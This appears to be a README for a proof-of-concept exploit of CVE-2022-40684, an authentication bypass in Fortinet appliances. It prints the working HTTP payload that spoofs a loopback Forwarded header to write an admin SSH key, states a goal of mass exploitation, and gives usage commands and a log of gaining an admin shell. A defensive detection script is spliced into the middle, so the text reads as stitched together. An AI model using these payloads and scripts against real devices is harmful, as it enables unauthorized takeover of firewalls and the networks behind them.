For now this is a POC copy for CVE-2022-40684, an authentication bypass affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances.
Copied from https://github.com/horizon3ai/CVE-2022-40684
The exploit uses this simple payload:

```http
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length: 610

{
    "ssh-public-key1": "fake-key"
}
```
This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
The plan is to develop it into a full-scale exploit with multiple targets and multiple servers for mass exploitation.
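For defenders, the payload above is also a usable detection signature: the bypass depends on a write to the `system/admin` object over the REST API combined with a `Forwarded` header that claims a loopback origin and the hard-coded `Report Runner` User-Agent. The following is an added example, not part of this repository or of horizon3ai's code; it parses raw HTTP requests as a reverse proxy, WAF or IDS in front of the management interface would capture them and flags that combination. The hostname, sample requests and thresholds are constructed for the example.

```python
"""Flag requests matching the CVE-2022-40684 authentication-bypass pattern."""
import re
from dataclasses import dataclass

# REST path of the administrator account object (taken from the payload above).
ADMIN_CMDB_PATH = re.compile(r"^/api/v2/cmdb/system/admin(?:/|\?|$)")
# Forwarded header claiming the request came from the loopback address.
FORWARDED_LOOPBACK = re.compile(r"for=\[?127\.0\.0\.1\]?(?::\d+)?", re.IGNORECASE)
REPORT_RUNNER_UA = "report runner"


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict  # header names are lower-cased


def parse_raw_request(raw: str) -> HttpRequest:
    """Parse the request line and headers of a raw HTTP/1.x request (body ignored)."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = head.strip().splitlines()
    method, target = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(method.upper(), target, headers)


def bypass_indicators(req: HttpRequest) -> list[str]:
    """Return the individual indicators present in one request."""
    found = []
    if req.method in ("PUT", "POST") and ADMIN_CMDB_PATH.match(req.path):
        found.append("write to system/admin object via REST API")
    if FORWARDED_LOOPBACK.search(req.headers.get("forwarded", "")):
        found.append("Forwarded header spoofs loopback origin")
    if req.headers.get("user-agent", "").strip().lower() == REPORT_RUNNER_UA:
        found.append("User-Agent 'Report Runner' on management API")
    return found


def is_bypass_attempt(req: HttpRequest) -> bool:
    """True when an admin-object write is paired with at least one spoofing indicator.

    The path alone is not enough: an authenticated operator may legitimately
    change admin accounts through the REST API, so the spoofed header or the
    hard-coded User-Agent must be present as well.
    """
    found = bypass_indicators(req)
    return any(i.startswith("write to system/admin") for i in found) and len(found) >= 2


def scan_requests(raw_requests: list[str]) -> list[tuple[int, list[str]]]:
    """Scan a batch of raw requests; return (index, indicators) for each hit."""
    hits = []
    for idx, raw in enumerate(raw_requests):
        req = parse_raw_request(raw)
        if is_bypass_attempt(req):
            hits.append((idx, bypass_indicators(req)))
    return hits


# Constructed samples: the first mirrors the payload above, the second is a
# benign configuration read, the third a legitimate admin update from a normal session.
SAMPLE_EXPLOIT = (
    "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\r\n"
    "Host: fw.example.internal\r\n"
    "User-Agent: Report Runner\r\n"
    "Content-Type: application/json\r\n"
    "Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\r\n"
    "Content-Length: 31\r\n"
    "\r\n"
    '{"ssh-public-key1": "fake-key"}'
)
SAMPLE_BENIGN_READ = (
    "GET /api/v2/cmdb/system/admin HTTP/1.1\r\n"
    "Host: fw.example.internal\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)
SAMPLE_LEGIT_UPDATE = (
    "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\r\n"
    "Host: fw.example.internal\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 28\r\n"
    "\r\n"
    '{"trusthost1": "10.0.0.0/8"}'
)

if __name__ == "__main__":
    for idx, reasons in scan_requests([SAMPLE_EXPLOIT, SAMPLE_BENIGN_READ, SAMPLE_LEGIT_UPDATE]):
        print(f"request #{idx}: suspected CVE-2022-40684 attempt: {', '.join(reasons)}")
```

Only the first sample is reported. Requiring the admin-object write plus a spoofing indicator keeps ordinary REST API administration from firing on path alone, while still catching a variant that drops either the `Forwarded` header or the User-Agent. On the device side, Fortinet's advisory for this issue (FG-IR-22-377) points at log entries with `user="Local_Process_Access"` as the indicator to review; that check is not implemented here.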
1. `chmod +x cve-2022-40684.sh`
2. `./cve-2022-40684.sh <TARGET_IP>`
   or
2. `./cve-2022-40684.sh <FILE_NAME>`

Example:

```shell
./cve-2022-40684.sh ips.txt
```
```shell
python3 CVE-2022-40684.py -t <TARGET_IP> --username admin --key-file ~/.ssh/id_rsa.pub
```

Example:

```
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh admin@10.0.40.67
fortios_7_2_1 #
config    Configure object.
get       Get dynamic and system information.
show      Show configuration.
diagnose  Diagnose facility.
execute   Execute static commands.
alias     Execute alias commands.
exit      Exit the CLI.
```